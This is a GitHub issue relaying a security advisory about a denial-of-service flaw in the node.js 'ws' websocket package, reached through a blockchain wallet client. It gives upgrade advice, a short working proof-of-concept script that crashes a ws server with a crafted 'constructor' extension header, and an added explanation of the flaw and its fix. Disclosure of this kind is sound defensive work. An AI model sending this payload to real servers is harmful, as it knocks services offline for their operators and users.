
Denial of Service (DoS)

Open larrycameron80 opened this issue 6 years ago • 0 comments

Denial of Service (DoS)

Vulnerable module: ws

Introduced through: [email protected]

Detailed paths

Introduced through: blockchain-wallet-client@blockchain/My-Wallet-V3#c0bf5615c862fb8d7ec5e3f5031c2998b8ddc690 › [email protected]

Remediation: Upgrade to [email protected].

Overview

ws is a simple to use websocket client, server and console for node.js.

Affected versions of this package are vulnerable to Denial of Service (DoS) attacks. A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.

PoC:

```js
const WebSocket = require('ws');
const net = require('net');

// Start a local ws server, then send it a raw upgrade request
const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor'; // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});
```

larrycameron80 • Sep 17 '19 02:09
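
The failure mode described in the overview, as an added example that is not part of the original issue and is not the ws source code: a simplified extension-header parser run once with a plain `{}` accumulator and once with a null-prototype one. The names `parseExtensions`, `tryParse`, `unsafeMap` and `safeMap` are hypothetical, and the sample headers are constructed.

```javascript
// Added illustration: simplified Sec-WebSocket-Extensions parser, not ws source.
// Header grammar handled here: "ext1; param=value, ext2; flag"
function parseExtensions(header, makeMap) {
  const offers = makeMap();
  for (const part of (header || '').split(',')) {
    const params = part.split(';').map((s) => s.trim());
    const name = params.shift();
    if (!name) continue;
    // With a plain {} map, offers['constructor'] is the inherited Object
    // function, so this guard is skipped and the .push below throws.
    if (offers[name] === undefined) offers[name] = [];
    const parsed = makeMap();
    for (const p of params) {
      if (!p) continue;
      const eq = p.indexOf('=');
      const key = eq === -1 ? p : p.slice(0, eq).trim();
      const val = eq === -1 ? true : p.slice(eq + 1).trim();
      if (parsed[key] === undefined) parsed[key] = []; // same flaw for parameter names
      parsed[key].push(val);
    }
    offers[name].push(parsed);
  }
  return offers;
}

const unsafeMap = () => ({});                 // inherits from Object.prototype
const safeMap = () => Object.create(null);    // no inherited keys to collide with

// Returns 'ok' or the error name an upgrade handler would see if it did not catch
function tryParse(header, makeMap) {
  try {
    parseExtensions(header, makeMap);
    return 'ok';
  } catch (err) {
    return err.name;
  }
}

// Constructed sample headers (the first is the value used in the PoC above)
const samples = [
  'constructor',
  'permessage-deflate; constructor',
  'permessage-deflate; client_max_window_bits=10',
];
for (const h of samples) {
  console.log(JSON.stringify(h), 'plain {}:', tryParse(h, unsafeMap),
    '| null-prototype:', tryParse(h, safeMap));
}
```

In a server, the `TypeError` is raised while the upgrade request is being handled; if nothing catches it there, it terminates the Node.js process, which is the crash the advisory describes.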